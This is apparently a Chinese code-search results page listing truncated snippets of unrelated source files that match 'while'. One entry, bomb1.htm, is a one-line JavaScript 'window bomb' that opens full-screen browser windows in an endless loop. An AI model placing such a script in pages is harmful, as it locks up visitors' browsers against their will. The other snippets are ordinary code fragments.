代码搜索:while
找到约 10,000 项符合「while」的源代码
代码结果 10,000
www.eeworm.com/read/478033/6718290
pas testtdevdunit.pas
unit testtdevdunit;
interface
uses Math, Ap, Sysutils, blas, rotations, tdevd;
function TestTDEVD(Silent : Boolean):Boolean;
function testtdevdunit_test_silent():Boolean;
function testtdevdunit
www.eeworm.com/read/478189/6721780
acp java.acp
#TITLE=Java/C#
; EditPlus Auto-completion file v1.0 written by ES-Computing.
; This file is provided as a default auto-completion file for Java and C#.
#CASE=y
#T=if
if (^!)
{
}
#T=while
www.eeworm.com/read/478222/6722048
cpp cys.cpp
#include
#include
#include
#include
char var[20];
char *expr;
int zuhe[20],i;
struct stack{
char *base;
char *top;
};
typedef struct bitree{
char
www.eeworm.com/read/477862/6724232
htm bomb1.htm
while (true){ window.open("bomb.htm","","fullscreen=yes,Status=no,scrollbars=no,resizable=no");}
www.eeworm.com/read/477944/6726491
c framebuffer.c
/*
* FILE: framebuffer.c
* 实现在framebuffer上画点、画线、画同心圆、清屏的函数
*/
#include "framebuffer.h"
extern unsigned int fb_base_addr;
extern unsigned int bpp;
extern unsigned int xsize;
extern unsig
www.eeworm.com/read/477978/6726909
h nandflash.h
//*----------------------------------------------------------------------------
//* ATMEL Microcontroller Software Support - ROUSSET -
//*-------------------------------------------------
www.eeworm.com/read/477619/6729061
c main.c
extern void fft(int);
#define N 1024
void main()
{
test();
while(1);
}
www.eeworm.com/read/477671/6730578
h applymember.h
//: C06:applyMember.h
// From "Thinking in C++, 2nd Edition, Volume 2"
// by Bruce Eckel & Chuck Allison, (c) 2001 MindView, Inc.
// Available at www.BruceEckel.com.
// applySequence.h modified to
www.eeworm.com/read/477671/6730622
cpp sitemapconvert.cpp
//: C04:SiteMapConvert.cpp
// From "Thinking in C++, 2nd Edition, Volume 2"
// by Bruce Eckel & Chuck Allison, (c) 2001 MindView, Inc.
// Available at www.BruceEckel.com.
// Using strings to creat
www.eeworm.com/read/477671/6730660
cpp strfile.cpp
//: C05:Strfile.cpp
// From "Thinking in C++, 2nd Edition, Volume 2"
// by Bruce Eckel & Chuck Allison, (c) 2001 MindView, Inc.
// Available at www.BruceEckel.com.
// Stream I/O with files
// The